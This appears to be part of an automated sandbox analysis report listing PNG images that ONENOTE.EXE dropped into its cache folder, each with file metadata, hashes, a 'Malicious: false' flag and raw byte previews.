Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b. &M.d-e... ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...\|....7...b...\|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..\|..[..g%(h.....W...?...UDh..T$..?....\|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,\|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?\|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.943341403425058
Encrypted:	false
SSDEEP:	96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
MD5:	817D5A35EDB2B0E052194D4F49FDA19C
SHA1:	FA6CB2016C5F43B76102B63D60359139227E07EA
SHA-256:	0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
SHA-512:	E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
Malicious:	false
Preview:	.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b...%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....\|=.#.=.32..o.<.TnQ....g.zN...n...!/.........!....F..]...6...m...CX..~...+..U...E.\|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}.....N...N.\|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv\|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2599
Entropy (8bit):	7.903700862190034
Encrypted:	false
SSDEEP:	48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
MD5:	E88131C9AAC52649FF044905ACAB9B76
SHA1:	34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
SHA-256:	30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
SHA-512:	97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
Malicious:	false
Preview:	.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B\|E..>.....Q........b[.K........m.(..... ...!%1%-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.\|...Yszl.N.:......KPs.):).T.5...&B.....5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.\|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......\|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.\|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1570
Entropy (8bit):	7.780157858994452
Encrypted:	false
SSDEEP:	48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
MD5:	EF9AA5B2ADBE5DF68AC4F4D716DF7708
SHA1:	363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
SHA-256:	3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
SHA-512:	EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
Malicious:	false
Preview:	.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.>.E,;.....~..\|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&............Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~\|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er\|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.\|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D\|3t.-\g...Q

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4490
Entropy (8bit):	7.928016176674318
Encrypted:	false
SSDEEP:	96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
MD5:	7F161B19B937AB48D4FD2F6E5E16FDBD
SHA1:	BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
SHA-256:	C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
SHA-512:	E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
Malicious:	false
Preview:	.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.\|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.\|...\.z..6j>..n....Y.&G.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P.....'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^.....W..?}t...{.B.8..D...UPa..~..C...\|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.......G...K.....e...b.\|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000019.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11449
Entropy (8bit):	7.91552812501629
Encrypted:	false
SSDEEP:	192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
MD5:	163E6791C87E4999C343EC5E23843B15
SHA1:	43CE3BAE19E22876483A7FD0E93DB45790373600
SHA-256:	DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
SHA-512:	98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....\|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E\|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.\|..\|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001C.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3679
Entropy (8bit):	7.931319059366604
Encrypted:	false
SSDEEP:	96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
MD5:	995CEACAD563F849C4142B6A6F29F081
SHA1:	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
SHA-256:	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
SHA-512:	3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.\|.y\|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(\|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..\|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<......{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy..ET.PM...c....~(.g..*...ol.K......Sc8..q.F.KM"<...:t.O.>b..$t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`............M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001D.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	7.837610270261933
Encrypted:	false
SSDEEP:	48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
MD5:	EDB5ED43CC6038500A54B90BEC493628
SHA1:	A8CD63F3914E4347F4C5552FB922C6C03917F45F
SHA-256:	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
SHA-512:	4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...........A..!.A.....R.Ai%YH..(M.".h.cf.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8...X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o\|%..7..'.....N.\|..Vi...q..uO,`/....\W{..y...&iI..\|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.\|....8..H......_...G...\|......;6YQ\|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001E.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001F.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13084
Entropy (8bit):	7.940058639272698
Encrypted:	false
SSDEEP:	384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
MD5:	0693DABBBC411538D209F32E22F622F6
SHA1:	FB7E675406FA123CDB7E058D336742D6A2E8DC8E
SHA-256:	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
SHA-512:	F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
Malicious:	false
Preview:	.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u..........OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................),...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....\|r1

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001G.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001H.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4847
Entropy (8bit):	7.950192613458318
Encrypted:	false
SSDEEP:	96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
MD5:	A1A1017A6A7928761CEB56D1D950E123
SHA1:	28272E9C7F816A1CE8F2033FC00F489005332365
SHA-256:	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
SHA-512:	10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
Malicious:	false
Preview:	.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..\|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...\|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.\|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001I.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001J.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1657
Entropy (8bit):	7.80882577056055
Encrypted:	false
SSDEEP:	24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
MD5:	D5F7A65469623327F799B516ACBFFD2F
SHA1:	76C6333C14AF3A7EA091819953E6E12DC289A12C
SHA-256:	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
SHA-512:	351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
Malicious:	false
Preview:	.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..\|'.n.x...c....._O...[)......S..Q...d......A....4..t....E..v..}..7...t.b....,/\|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001K.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2210
Entropy (8bit):	7.86853667196985
Encrypted:	false
SSDEEP:	48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
MD5:	73E38124F94AD20A2F1571FBBE11AEEC
SHA1:	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
SHA-256:	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
SHA-512:	320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
